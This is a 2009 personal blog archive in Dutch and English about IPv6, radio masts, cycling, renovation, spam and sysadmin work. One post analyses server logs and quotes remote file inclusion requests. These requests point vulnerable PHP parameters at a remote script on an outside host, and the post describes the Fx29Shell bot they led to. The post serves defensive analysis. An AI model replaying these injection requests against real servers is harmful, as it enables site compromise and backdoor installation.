News archive 2009 - Koos van den Hout

Maandag was de Oliebollentocht 2009 van de NVHPV. Als rijder van een 'open' ligfiets mochten we niet meerijden maar we zijn wel op het Domplein en bij Vleuten gaan kijken naar het voorbijrijden van alle velomobielrijders wat natuurlijk zeer fotogeniek is. Op het Domplein was de 'foto-opportunity' waar ook pers voor uitgenodigd was. Mijn dag was ook weer helemaal goed: ik werd ook aangezien voor persfotograaf. Oliebollentocht 28 December 2009 foto's Koos van den Hout (speciaal voor Oscar).

Nog een paar zendmast foto's: tijdens onze ligfietsvakantie door Duitsland zijn we ook langs de Sender Höhbeck gefietst. Op 12 Augustus 2009 heb ik Sender Höhbeck met zendmasten Gartow 1 en Gartow 2 gefotografeerd. Toen ik thuis achteraf ging zoeken welke masten we gezien hebben stond er volgens de wikipedia pagina nog maar 1, na goed lezen bleek Gartow 1 op 20 Augustus 2009 opgeblazen te zijn. Aan deze zendmasten zat een hoop koude oorlog historie, ze onderhielden een televisie, radio en telefoonverbinding tussen West-Duitsland en West-Berlijn. Daarnaast was het ook de zender voor de ZDF in de regio waardoor deze 'toevallig' ook in een aardig stuk van de voormalige DDR te ontvangen was.

Nog wat foto's van de Gerbrandytoren: zo ken ik de Gerbrandytoren vanuit Nieuwegein van vroeger en de Gerbrandytoren als de grootste kerstboom ter wereld.

Meer bijgewerkte zendmast foto's: Zendmast Wieringermeer is uitgebreid met omschrijvingen van delen van de mast aan de hand van het FM Antenne hoogte overzicht van Radio en TV Zenders in Nederland.

Zomaar tijd gehad om uitgebreid zendtoren foto's uit te zoeken. Eerste resultaat, de foto's van zendmast Lopik te IJsselstein / Gerbrandytoren zijn uitgebreid met foto's van meer antennes en gegevens erover. Het was even zoeken maar met behulp van Radio en TV Zenders in Nederland en Zenders Lopik, IJsselstein van Hein ten Horn is de pagina goed bijgewerkt. Nu nog tijd vinden om wat foto's te maken van deze toren als de grootste kerstboom van de wereld want het is ze dit jaar weer gelukt.

Sommige mensen blijven zo dom om het e-mail adres van een ander in te vullen op een site om zo van eventuele reclame af te komen. Maar soms kan dat vervelende effecten hebben. Zo kreeg ik net een wel heel duidelijk verdwaald mailtje:

   Beste klant,
   U hebt een opwaardeervoucher besteld bij Lebara NL WEB Reloads op 22
   december 2009 15:00:23 CET.
   Als u deze opwaardeervoucher wilt gebruiken, belt u gratis naar 1244
   met opwaardeercode 27964964967133.

Maar dat heb ik helemaal niet gedaan. Ik denk dat er iemand nu heel boos probeert de klantenservice van Lebara te bellen.

Winter picture time:

Sparrow visiting the birdfeeder

The temperature sensor connected to the heater is working nicely and tells us the problem with the heater is only in the hot-water producing part.
And the picture is a nice update for the 1-wire projects page.

Toen ik aan het kijken was naar VPS hosting met IPv6 support kwam ik ook informatie tegen dat OpenVZ en IPv6 slecht samengaat. Maar Henk van de Kamer is er eens mee bezig gegaan en kwam er achter dat IPv6 onder OpenVZ prima aan de gang te krijgen is. Kortom: geen belemmering voor VPS aanbieders die OpenVZ gebruiken om ook IPv6 aan te bieden.

Ik was even aan het zoeken naar wat extra informatie voor mijn foto's van de zendmast Lopik te IJsselstijn / Gerbranditoren want ik wist van deze foto niet wat de antennes net onder de top zijn. Gevonden op Zenders Lopik, IJsselstein van Hein ten Horn (foto daar is van voor de ontmanteling van de Nederland 1 VHF zender): het zijn de antennes van Radio M op 93.1 MHz FM.

3FM Serious Request volgen in hoge kwaliteit? Dan heb je IPv6 nodig! De mensen van omroep.nl streaming hebben de Serious Request streams ook via IPv6 beschikbaar gemaakt en de 'main' stream is alleen via IPv6 op 3 megabit te krijgen.

Natuurlijk wil je IPv6, maar dit is een extra argument!

Stream URLs:
http://www.omroep.nl/live/ipv6/3fm_sr2009_main.asx <- Hoge kwaliteit via IPv6
http://www.omroep.nl/live/ipv6/3fm_sr2009_brievenbus.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_cam1.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_djcam.asx
http://www.omroep.nl/live/ipv6/3fm_sr2009_buitenshot.asx

Ik las vanmorgen in de Volkskrant dat 'Teletext' in Engeland er mee opgehouden is: 4e tussenkopje in dit artikel uit het betaalde archief van de volkskrant. Ik vond het al wat verwarrend omdat het ging over 'Teletext' terwijl de dienst bij de BBC 'Ceefax' heet. De schrijver van het artikel leek ook aan te nemen dat het over de BBC ging:

In Nederland is Teletekst onderdeel van de Publieke Omroep, terwijl de dienst in het Verenigd Koninkrijk zichzelf moest bedruipen met inkomsten uit advertenties.

Dit is alleen geldig voor de diensten van 'Teletext UK' die op de commerciële TV-zenders opereert. Ceefax is apart en wordt betaald uit de beruchte 'TV License' in Engeland.

Enfin, gelijk eens gekeken op BBC 1/2 en daar zag ik ook geen Ceefax meer. Ik ging er van uit dat iemand bij Ziggo het bericht ook niet helemaal gesnapt had en maar de hele zaak had uitgezet maar nu ik even zoek in nl.media.tv via google groups lijkt het er op dat het al veel langer uitstaat. Vreemd, ik dacht dat ik een paar weken terug nog het uitzendschema van Top Gear had nagekeken op BBC2 Ceefax.
Update 2009-12-17: Alleen pagina 888 (ondertiteling) doet het nog, wat overeenkomt met meldingen in nl.media.tv dat die ondertiteling uit de dvb ondertiteling komt (is apart van teletekst) en dan vervolgens als teletekstpagina 888 toegevoegd word aan het analoge signaal.

Snow this morning

Snow! And the associated traffic mess in the Netherlands.

We hung up a bird-feeder in the backyard last weekend and it is now very popular since it got cold the last few days, making for a few nice pictures this morning. They look a lot better at full size.

Sparrow in the backyard

Sparrow in the backyard

Our heating seems to be having problem, probably related to the changes recently. But to diagnose the problem completely we need to see what is happening. So one of the one-wire temperature sensors is now tie-wrapped to the output pipe of the central heating and measurements are logged.

Wardriving results 24 November - 13 December: 3026 new networks with gps locations. The wardriving box gets taken out again on some trips.

It's that xsnow time of year. I wanted to compile it for our students and staff to use and found a major Makefile and a real Imakefile (remember those?):

$ wc Makefile  Imakefile 
  957  2413 26799 Makefile
    7    21   172 Imakefile

Trying to find the 'real' problem I managed to reduce all that to:

xsnow: xsnow.o toon_root.o
        gcc -o xsnow xsnow.o toon_root.o -lm -lXpm -L/usr/X11R6/lib

imake gave us somewhat overkill Makefiles...

De schilder had de cat6 connectoren meegenomen (zonder afplaktape erover) dus ik heb de nodige verf er uitgepeutert en daarna connectors aan de kabels geknepen om ze te testen en gelijk te labelen. Gelukkig werkte alles op gigabit snelheid zonder fouten, maar ik denk niet dat er in de Category 6 specificaties ruimte is voor verf in de connector.

So Google announce their public DNS servers. First thing I try:

koos@greenblatt:~$ dig +short @8.8.8.8 www.google.com aaaa
www.l.google.com.

Too bad! Do they support AAAA records at all?

koos@greenblatt:~$ dig +short @8.8.8.8 idefix.net aaaa
2001:888:1011::694

Yes. But according to the FAQ item on IPv6 it does not support IPv6 as transport at all. Weird for google to roll out a new service so close to the network and not support IPv6.

I follow the comic strip Questionable Content and the latest character added Cosette is promising to be a lot of fun.

Vandaag heb ik voor het eerst gekookt in de nieuwe keuken. Dat is genieten, een goeie inductie-kookplaat in plaats van camping-branders.

Vandaag is de nieuwe keuken geinstalleerd waarmee het ineens erg mooi uit gaat zien. De foto's van de verbouwing zijn bijgewerkt.

After finding shortcomings in the verification by openssl s_client I tried the gnutls command-line client gnutls-cli. The upside of gnutls-cli is that it does use IPv6 when available. But.. gnutls-cli decides not to trust a server when using the same certificate set as used in testing openssl s_client.

~$ gnutls-cli --x509cafile /etc/ssl/certs/ca-certificates.crt -p imaps imaps.cs.uu.nl
..
*** Verifying server certificate failed...

versus

:~$ openssl s_client -verify 10 -CAfile /etc/ssl/certs/ca-certificates.crt -connect imaps.cs.uu.nl:imaps
..
    Verify return code: 0 (ok)

Weird. I would not be completely surprised when my own root CA had issues in very strict utilities but the chain used for the work servers is very well tested.

Update 2012-04-01: Found out later that gnutls-cli had a point: the order of the certificate chain given by the server was incorrect. Which is something all other applications allow.

De winnaars van de IPv6 awards zijn bekend gemaakt vanmiddag:

Categorie ISPs: BIT

Categorie bedrijfsleven: Watchmouse

Categorie publicatie: Arnout Veerman

Categorie onderwijs: Hogeschool Utrecht en Universiteit van Amsterdam

Categorie particulieren: Jasper Wonnink

Door diverse sponsors zijn mooie prijzen beschikbaar gesteld. Persbericht IPv6 taskforce over de awards (PDF)

Zelf ben ik dus buiten de prijzen gevallen. Maar veel belangrijker is dat dit weer aandacht verzorgt voor IPv6. De uitreiking was onderdeel van het jaarcongres ECP-ECN en daar heb ik mensen uit diverse branches gesproken die nu door beginnen te krijgen dat IPv6 een onderwerp is om rekening mee te houden. Voor de meesten is alles 'netwerk' of 'Internet' maar die moeten er toch rekening mee houden dat dat 'Internet' wel aan het veranderen is.

I like my SSL verification tools paranoid, and it seems openssl s_client -verify isn't paranoid enough. The man page reports:

BUGS

       The -verify option should really exit if the server verification
       fails.

I'd like added "the hostname in the certificate is not verified". I ran a little test server to test for the right way to configure the SSL certificates in openldap server and noticed I got the verification to work even when I was connecting to the wrong name.

Met een folder over het tatoeëeren van je burgerservicenummer keurig in de stijl van andere folders van de overheid (PDF formaat) vraagt Het Nieuwe Rijk aandacht voor de opslag van vingerafdrukken.

Uit de beweegredenen van deze groep:

Het verbaast niet dat de aanleg en gebruik van deze vingerafdrukkendatabase op gespannen voet staat met het grondrecht op privacy, zoals vastgelegd in artikel 10 van de Nederlandse Grondwet en artikel 8 van het Europees Verdrag voor de Rechten van de Mens. Ook het College Bescherming Persoonsgegevens (CBP), verschillende onderzoekers, hoogleraren en deskundigen op het gebied van informatica, rechtspsychologie, computerbeveiliging en zelfs de Europese Toezichthouder voor Gegevensbescherming hebben zich zeer kritisch uitgelaten over deze ontwikkeling.

De Nederlandse regering wil het doen lijken alsof zij deze database op grond van Europese wetgeving aanlegt. Maar dat is niet het geval.

Opvallend is hoe in de reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties alleen ingegaan wordt op de folder en de eventuele misleiding. Deze reactie is gepubliceerd toen de makers van de folder en het onderwerp waar aandacht voor gevraagd wordt nog onbekend waren, dus misschien komt daar nog verandering in.

Ik hoop dat de ophef over de verwijzing naar de holocaust niet teveel af zal leiden (of misbruikt zal worden om af te leiden) van het onderwerp waar het over gaat: de ongeoorloofde opslag van vingerafdrukken.
Update : Ook in de tweede reactie van het ministerie van binnenlandse zaken en koninkrijksrelaties wordt absoluut voorbijgegaan aan het doel van de actie. Op zijn minst is het jammer dat ze daar niet op ingaan. Ondertussen stromen de ondertekeningen van de petitie tegen de opslag van de vingerafdrukken binnen.

I was replacing ssl certificates on a lot of servers and got it working everywhere except on our ldap server. The SSL certificate chain wasn't given out so there was no link between a trusted root and the certificate on the server. I had it configured:

TLSCACertificateFile /etc/openldap/ssl/cacert.pem
TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the certificate in servercrt.pem and the intermediate certificates in cacert.pem. But that was a config from an older server which uses OpenSSL, including openssl libraries (libssl). The newer ldap server uses the gnu tls libraries (libgnutls) which really need:

TLSCertificateFile /etc/openldap/ssl/servercrt.pem
TLSCertificateKeyFile /etc/openldap/ssl/serverkey.pem

With the server certificate and the entire chain together in servercrt.pem. Something to keep in mind, so I documented it on our internal wiki.

Wardriving results 28 September - 23 November: 1831 new networks with GPS locations. Not much wardriving happening due to the construction work at home.

I realized there is one piece of software running on my server which has a small chance of having a known leak because it is a widely used package: Serendipity powers the hcc!pc gg netwerkgroep website and I hadn't upgraded it recently. A very small chance, since security is a very important part of the Serendipity design. Since upgrading phpBB for Camp Wireless was always a royal pain in the behind I sort of postponed this process. But after the serious search for any security flaw in my website I searched on the Serendipity site for an explanation of the upgrade process. And the answer: upgrading Serendipity is very, very easy. More PHP applications should be this easy to upgrade.
Update: A frequent reader notes that I had a bit of a strong opinion: lots of PHP software is easy to upgrade, phpBB is/was just a problem because the templating system is too integrated in the source.

Somebody in Denmark thought something in this webserver would run some default and vulnerable software and tried to find a hole:

$ grep -c 90.185.249.111 ~httpd/idefix/logs/access_log
4208

All tries to display http://www.spotmerkezi.com/cache/id1.txt which is a bit of PHP source:

<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

Which will display ShiroHige as one word when run through the php processor.

All urls are attempts where it is assumed some vulnerable script is behind some visible part of the site such as the root, or my homepage, or some part of my homepage. Samples:

GET //?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos//administrator/components/com_a6mambohelpdesk/admin.a6mambohelpdesk.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//?mosConfig_absolute_path=%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newsitem.cgi//administrator/components/com_a6mambocredits/admin.a6mambocredits.php?mosConfig_live_site=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//libraries/pcl/pcltar.php?g_pcltar_lib_dir=%20http://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//templates/be2004-2/index.php?mosConfig_absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??
GET /~koos/newstag.cgi/security%20%20//modules/mod_weather.php?absolute_path=%20%0Dhttp://www.spotmerkezi.com/cache/id1.txt??

A bit of research finds that the next bit of code to execute would try to get info on the php setup (os, rights, free disk space). The third bit is running an entire bot with a few backdoors. I tried to find where the backdoor would connect to but that is all dynamic, only when the third script is loaded via the vulnerability a number of variables are set with the IP and port to connect to.

Like any good bot, it also notifies its maker in a hidden away part of its source, which would look like:

To: feelcomz@gmail.com
Subject: Fx29Shell http://server.name/vulnerable.url by 10.2.1.1

Boss, there was an injected target on http://server.name/vulnerable.url by 10.2.1.1

Searching on the term Fx29Shell gives a scary answer: Results 1 - 10 of about 221,000 for Fx29Shell. a lot of those still showing webservers where this script is active.

But all my home-made webstuff is not in the habit of executing remote php scripts. But given the load of sites hosted on 90.185.249.111 it's probably a script running on that server which got hacked from a third place.

I'm building a new box at work and I waited a bit with ratelimiting ssh connections (ssh is already configured to only allow valid accounts with pre-established keys). The result of one night..:

# egrep -c 'sshd.*(Invalid user|not allowed)' auth.log 
2179

I played with temporary IPv6 addresses recently, the privacy extension where the right half of the address isn't always the same address derived from the ethernet mac address but a random address. I noticed when I set Linux to use the temporary address as preferred address it was listed as 'secondary':

# ip -6 addr ls
1: lo:  mtu 16436 
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
22: wlan0:  mtu 1500 qlen 1000
    inet6 2001:888:1011:1:10f3:2799:3587:237e/64 scope global secondary dynamic 
       valid_lft 604544sec preferred_lft 85544sec
    inet6 2001:888:1011:1:21f:e1ff:fe45:2894/64 scope global dynamic 
       valid_lft 2591744sec preferred_lft 604544sec
    inet6 fe80::21f:e1ff:fe45:2894/64 scope link 
       valid_lft forever preferred_lft forever

I thought maybe I can use this to fix my outgoing IPv6 address selection problem. Searching for clues how to change the status of an IPv6 address using the ip command I found: IPv6 Source Address Selection on Linux which answers my question completely, and now I can 'block' the tunnel address completely for outgoing connections:

# ip -6 addr ls dev xs4allipv6
7: xs4allipv6@NONE:  mtu 1480 
    inet6 2001:888:1011::13/128 scope global 
       valid_lft forever preferred_lft forever
    inet6 2001:888:10:11::2/64 scope global deprecated 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:1401/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::525f:c4ca/64 scope link 
       valid_lft forever preferred_lft forever
    inet6 fe80::a2a:201/64 scope link 
       valid_lft forever preferred_lft forever

The tunnel address is 'deprecated' so it will not be used for outgoing connections but the system still responds to it so routing works. Now the wanted address is chosen when I connect to a system 'nearby' in IPv6 address terms:

tcp6       0      0 2001:888:1011::13:41041 2001:888:0:311:194::119 ESTABLISHED

Zojuist mail binnen: ik heb een nominatie voor de IPv6 awards in de categorie particulieren. De andere genomineerde in deze categorie is Jasper Wonnink van Fix6 die volgens mij minstens even veel kans maakt. Dus ik ben benieuwd.

De nominaties:

Bedrijfsleven	NetMatch, Watchmouse
Overheid & not-for-profit	Stichting DOK, Nederlandse Publieke omroep, Ministerie van Algemene zaken
Onderwijs	Hogeschool Utrecht, Universiteit van Amsterdam
Publicatie	Benjamin Margarita, Arnout Veenman, Marcel van de Kraats
Particulieren	Jasper Wonnink, Koos van den Hout
Internet Service Providers	BIT, Signet, Shock Media, Prolocation

IPv6 awards nominaties op de IPv6 taskforce website
Persaandacht:

• Nominaties van IPv6 Awards bekendgemaakt - Computable

Vanmorgen weer een compleet overbodige fietsers afstappen gezien. Wanneer komt er eens een bordje automobilisten uitstappen en duwen. Bijvoorbeeld op de A2N2 bij Eindhoven.

Power failure this morning at work.. which left us not in the dark (enough emergency lighting) but with a completely silent serverroom. When the power came back we had some hours of work to get everything up and running again. Worst problem was with a number of Xen based virtualhosts, some centos upgrade had suddenly created a network device virbr0 which uses NAT and a local dhcp pool and enslaved all xen domU network interfaces under that bridge with no access to the 'real' network because NAT was not set up so their NFS root mount failed. The details on virbr0:

virbr0    Link encap:Ethernet  HWaddr FE:FF:FF:FF:FF:FF
          inet addr:192.168.122.1  Bcast:192.168.122.255

A bit hard to disable, but at the end ifconfig virbr0 down ; brctl delbr virbr0 helps to get rid of the weird bridge, and all domUs will start after that.

Sheldon explains the cloud.

Mijn website heeft meer bezoekers dan die van de Telegraaf via IPv6.
Kijk maar op de 6bone Webserver List. Ontdekt door Henk van de Kamer die ook de telegraaf heeft verslagen.

Na de verhuizing van HCC!net mail (met diverse mailtjes aangekondigd) blijf ik nu zien uit fetchmail:

fetchmail: Server CommonName mismatch: localhost.localdomain != pop.hccnet.nl
fetchmail: Server certificate verification error: self signed certificate

En daar is geen uitleg over in de Veel gestelde vragen over HCC!net mail. Workaround: sslproto ssl23 in de regel voor pop.hccnet.nl zodat er geen TLS gebruikt wordt (ontleend aan How can I tell fetchmail not to use TLS if the server advertises it? Why does fetchmail use SSL even though not configured? - The Fetchmail FAQ). Beter zou natuurlijk zijn als pop.hccnet.nl gewoon een echt certificaat zou hebben.
Opmerkelijk is trouwens de sterk ontbrekende optie om HCC!net support te bereiken via e-mail op de contact pagina. Ik ga geen 60 cent per minuut betalen om ze uit te leggen dat ze het stuk gemaakt hebben.

Twee van mijn favoriete onderwerpen gecombineerd:

$ host www.ligfiets.net
www.ligfiets.net has address 82.94.245.48
www.ligfiets.net has IPv6 address 2001:888:2156::3:1:1

Nu dus ook via ipv6: www.ligfiets.net.

Going old-school today: I wrote a sed script to massage grub.conf to add a windows partition on a second disk. Searching google for has this been done before yields loads of page with handholding on how to add windows by hand to a grub.conf generated by anaconda but no simple 'automated' solution. I am always in favor of letting the computer do the boring work. But a bit of thinking and testing and now sed does the job:

if [ -b /dev/sdb1 ]; then

        cp /boot/grub/grub.conf /boot/grub/grub.conf.pre

        sed -e 's/timeout=5/timeout=30/' -e '/hiddenmenu/a\
title Windows XP (Service Pack 3)\
        rootnoverify (hd1,0)\
        map (hd0) (hd1)\
        map (hd1) (hd0)\
        makeactive\
        chainloader (hd1,0)+1
' -e '/hiddenmenu/d' < /boot/grub/grub.conf.pre > /boot/grub/grub.conf
fi

Everybody knows sed -e 's/../../' but I had to look up 'insert', 'append' and 'delete'.
Update 2009-11-12: Changed insert to append because the previous version inserted windows multiple times with multiple linux kernels. Once is enough. Also moved it from the post-install instructions to the post-reboot script so linux is fully configured before windows gets booted.

Maybe related to the constructionwork at home or to problems with the DSL network to my provider but 29 October was a day of intermittant DSL problems. And indeed, the resulting line quality graph looks 'interesting'.

Something up with sshd? Suddenly I see log entries (formatted for readability) like:

Nov  7 11:14:25 greenblatt sshd[5670]: Bad protocol version identification 'yJ
\316F\306J\226{B\247pvO\030B\330\332\352\257\337:\346\272h^\221\310\215\256C-
\253K\264l\265\320)\022\342\376\221\001?5\343\324\254\304\270\264FB\244#&tX
\3413\332m\352=\327\266\216\333\baZ<\006\267\243\236\214\217@:\021\273/vx\211
\313\362' from 220.225.222.226

I dislike seeing stuff like this.

I'm playing a bit with NDPMon - IPv6 Neighbor Discovery Protocol Monitor, now at version 1.4.0. Sofar, after configuring it in the right configuration file it likes one part of the home network (the wired part). I'm looking at it both from the viewpoint of playing with IPv6 and from the viewpoint of network security: can I use this to trace users of a network. In a large network like the one at work I could imagine ndpmon doing for IPv6 what arpwatch does for IPv4. Combine that with logs from the switches for tracing ethernet addresses and I see possibilities for a big, usable and at the same time manageable and secure network.

All the talk about gopher from the article The Web may have won, but Gopher tunnels on made me try whether I can run a gopher server which is reachable via ipv6. The answer is: yes I can.

gopher://gopher.idefix.net/ reachable via both IPv4 and IPv6.

Update 2009-11-05: and I'm not the first one to think of this. gopher://✎.net/ adds the fun of a punycode url.

Bedrijven niet voorbereid op uitputting webadressen. Alleen al door de term 'webadressen' heb je door dat de auteur wat details gemist heeft, maar we houden het er op dat het IPv6 in het nieuws weet te houden. De quote die ik er even uit wil halen:

Bovendien zijn niet alle bedrijven en organisaties op de hoogte van de noodzaak over te stappen op de nieuwe IP-versie.

Bedrijven roepen zelfs actief dat ze er prima uitkomen met NAT. En het helpt ook niet als Gartner roept dat 'we' ons nog geen zorgen hoeven te maken over IPv6: Gartner: Don't sweat move to IPv6 (heeft iemand toegang tot het originele rapport?). Veel mensen die beslissingen hierover nemen zullen Gartner graag als bron geloven.

CBC Canada has a great special: Berlin Wall: 20 years after the fall. I am glad we visited Berlin this summer and saw all the historic places from up close.

Mijn werkgever, het departement informatica van de Universiteit Utrecht, biedt ook een opleiding tot leraar informatica aan. Totnogtoe hebben ze daar nog niet zo veel reclame voor gemaakt, maar daar komt nu verandering in.

Beetje verstoring in de onweers sensor thuis, er was helemaal geen onweer volgens andere bronnen. Vermoedelijk een gevolg van de sloopwerkzaamheden van maandag.

Met de verbouwing en het boven wonen zaten we ook even na te denken over televisie: het aansluitpunt moet verplaatst worden en we hebben (nog) geen coax van beneden naar boven. Digitenne zou misschien een optie zijn voor tijdelijk maar die doen niet aan abonnementen van minder dan een jaar, terwijl de planning toch echt is dat we dit jaar nog weer normaal wonen en dan weer makkelijk bij de Ziggo kabeltv kunnen waar wel BBC 1 en BBC 2 bij zitten. Dus dan maar een lange verlengkabel (ik heb gelukkig een goede kabel in huis) door het hele trappenhuis voor als we televisie willen kijken en uitleggen dat je NIET op coax kabel mag staan.

I'm happy with my B+M ixon iq light on my recumbent bicycle but some people need more light, for example when cycling through the woods in Finland: Jukan put together a 24-watt 1680 lumen led light monster.
Found via Unreasonably bright bike light apparently hunts deer - Hack a Day (although the deer that seems to be in the resized picture is some bushes in the original picture).

The construction work at home shows a lot of progress at the moment. Tuesday morning work started and now half the back face of the house is already removed. Pictures of the progress with Dutch comments.

De verbouwing is begonnen: vanmorgen ging ik weg toen er gegraven werd voor de vloer van de uitbouw en toen ik terugkwam was de vloer gestort. Ik maak foto's van de voortgang

I noticed requests for port 37/udp in our firewall to our ntp server. That is the 'daytime' protocol which is absolutely ancient in an Internet timescale. I opened the port and started the service as an experiment and started tcpdump on it. The results are interesting:

09:50:09.749723 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 2, poll 7, prec -20
09:50:09.749782 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:52:19.808243 IP xx.xx.178.51.37 > 131.211.84.189.123: NTPv4 client, strat 3, poll 7, prec -20
09:52:19.808301 IP 131.211.84.189.123 > xx.xx.178.51.37: NTPv4 server, strat 2, poll 7, prec -19
09:53:08.511939 IP xx.xxx.183.183.34505 > 131.211.84.189.37: UDP, length: 0
09:53:08.513364 IP 131.211.84.189.37 > xx.xxx.183.183.34505: UDP, length: 4

Most traffic seen by 'tcpdump port 37' is from source port 37. Which is an artifact of certain NAT devices translating privileged ports (< 1024) to other privileged ports. Certain versions ntpd seem to ignore these requests. But there are real clients using the 'daytime' protocol.

In een discussie over 'durf je nu echt AAAA records te publiceren' vroeg ik me af of er een goeie, klantvriendelijke ipv6 test is voor websites met behulp van javascript. Natuurlijk is die er: http://ipv6test.max.nl/. Die heb ik dus snel geimplementeerd op 2 websites op het werk die nog geen ipv6 verbinding hebben maar waar we dat wel snel hopen: www.cs.uu.nl en helpdesk.cs.uu.nl. Hier komen 'onze' gebruikers langs dus is het erg interresant om te weten of in deze gebruikersgroep er een aandeel is wat problemen gaat krijgen als we AAAA records publiceren.

I brought some more USB sticks to test with and tested the filler script with 4 sticks. Interesting new problem: some USB sticks are partitioned like a harddisk and some aren't, now to find what to mount. Trying to mount everything gives a lot of kernel error messages. Using vol_id was the way to find the valid filesystems. The writing speed is still at maximum when I write 4 in parallel and no USB errors happen.

Some measurable growth in IPv6 traffic at the Amsterdam Internet Exchange: they broke the 2 Gbit IPv6 traffic (after rrdtool rounding ;)) limit. Compared to the total traffic flow (764 Gbit) this is still a very small drop but there is growth in there. On to more and more applications, dns entries and traffic! Source: AMS-IX hits 2 Gbps IPv6 traffic - Fix6

One mailing list hoster, ivillage.com, is still sending me loads of the unwanted mailing list spam and making it quite hard to get rid of it. They have 49 mailing lists, the retaliating spammer signed me up to about 41 of them, and to get rid of them I have to uncheck every one of them to unsubscribe. The 'support' link on the site let me fill in a form which got an autoreply pointing me to the unsubscribe form on the site. So more attempts to get through to them that they need to verify the addresses they get via the site and to get rid of all of their mail in one go. Reporting each and every one of their mails via spamcop has not made much of a difference yet. The acceptable use policy of their provider xo.com prohibits sending mail like this:

A communication may be unsolicited if: (1) recipients' email addresses were not obtained through a personal or customer relationship between recipient and sender, (2) recipients did not affirmatively consent to receive communications from sender, or (3) recipients have opted out of receiving communications from sender when given notice of the opportunity to do so.

I never confirmed receiving their mail, so they break rule 2.

Ok, discovering 'all USB storage' is not that hard:

ALLSTICKS=`/bin/ls /dev/disk/by-path/*usb*part1 2>/dev/null`

Now for the choice whether to fill them in parallel or serially. With two sticks (the amount I have available at the moment for testing) running two rsync processes in parallel makes the whole script (discover, mount, fill with rsync, unmount) take 27 seconds, waiting for the first rsync to finish before starting the second one takes 35 seconds. Interesting will be how these numbers look when I add more USB sticks.

An interesting project at work: copying a given set of data to as big a number of USB storage devices as possible. So we buy 4 USB hubs, which got delivered today. Connecting them to the 4 different external USB ports on my laptop shows an interesting result:

 lsusb -t
Bus#  7
`-Dev#   1 Vendor 0x0000 Product 0x0000
  |-Dev#  35 Vendor 0x2001 Product 0xf103
  | `-Dev#  36 Vendor 0x0718 Product 0x0075
  |-Dev#  34 Vendor 0x2001 Product 0xf103
  |-Dev#  33 Vendor 0x2001 Product 0xf103
  `-Dev#  32 Vendor 0x2001 Product 0xf103
Bus#  6
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  5
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  44 Vendor 0x0b97 Product 0x7761
    `-Dev#  45 Vendor 0x0b97 Product 0x7772
Bus#  4
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  3
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  2
`-Dev#   1 Vendor 0x0000 Product 0x0000
Bus#  1
`-Dev#   1 Vendor 0x0000 Product 0x0000
  `-Dev#  24 Vendor 0x413c Product 0x8140

Notice it? No? All the high-speed USB hubs (Vendor 0x2001 Product 0xf103) are behind the same root USB hub. Interesting USB congestion problems ahead probably.

My next step will be to discover all attached usb storage (probably thanking udev a lot in the process) and filling that storage with the wanted set of data.

Eneco werd wakker en stuurde antwoord! Eneco gaat kijken of het beter kan met de e-mail. En als ik naar 'mijn eneco' wil en het zelf in de browser wil intikken: http://www.eneco.nl/mijneneco of http://mijneneco.nl/. Beide geven (nu) de correcte redirect.

I just put a printout of the Google homepage under a barcode scanner and it indeed says: Google.

Nadat ik in Juni al last had van spam van idg uitgevers / Computer!Totaal krijg ik vanochtend weer e-mail van ze, dit keer op m'n hccnet adres (de hcc wil perse met je communiceren, dus ik moest mijn hccnet adres activeren om van computer!totaal af te komen toen die optie kwam). Blijkbaar hebben ze besloten bij IDG uitgevers om het ingaan van de nieuwe regels tegen spam in de telecomwet te vieren met een spamrun naar hun oude HCC adressenbestand.
Update 2009-10-06: Niet geheel onverwacht, ook Henk van de Kamer ergert zich aan dezelfde actie van IDG maar heeft de mail blijkbaar net gehad toen het nog 'minder strafbaar' was.

Suddenly I get numerous 'newsletter subscription' mails in my inbox, some declaring I subscribed and some asking me to confirm my subscription.

Samples:

Subject: You've Been Subscribed to iVillage!                                    

You have been subscribed to:

• YourTotalHealth Special Offers • Beauty & Style Top Ten • YourTotalHealth
Community Challenges 

Subject: Mind Tools Newsletter - Please Click Link to Confirm Subscription...   

Thank you for taking the first step in subscribing to the Mind Tools
Newsletter! There's just one more thing to do before your
subscription is activated,

Welcome!                                                       

Dear rty6ry,                                                                    

Welcome and thank you for subscribing to the Food
Reference weekly newsletter.   

Dear fyhfhfg,

Thank you for subscribing to UNESCO's Communication and Information Sector
newsletter.

We have registered your subscription with these details:

First Name ftgrt
Last Name  dggdf

I must have really pissed off some spammer to get some personal attention like this. GOOD. A spammer getting all worked up isn't spamming.
Too bad none of the mails tell me which IP address I 'subscribed' from, although I have a vague idea I need to search in the area of Heerlen / Kerkrade in the Netherlands.

All the subscriptions without confirmations will be reported as spam naturally.

Actual progress in windows printing: windows 2008 with office 2003 will give a warning message about trying to print an A4 document on a printer with Letter as default format. Fixed it by selecting the right papersize for the printer, no letter paper in this building. No PC LOAD LETTER on the printer display!

Wardriving results 31 August - 27 September 2009: 2491 new networks with GPS locations.

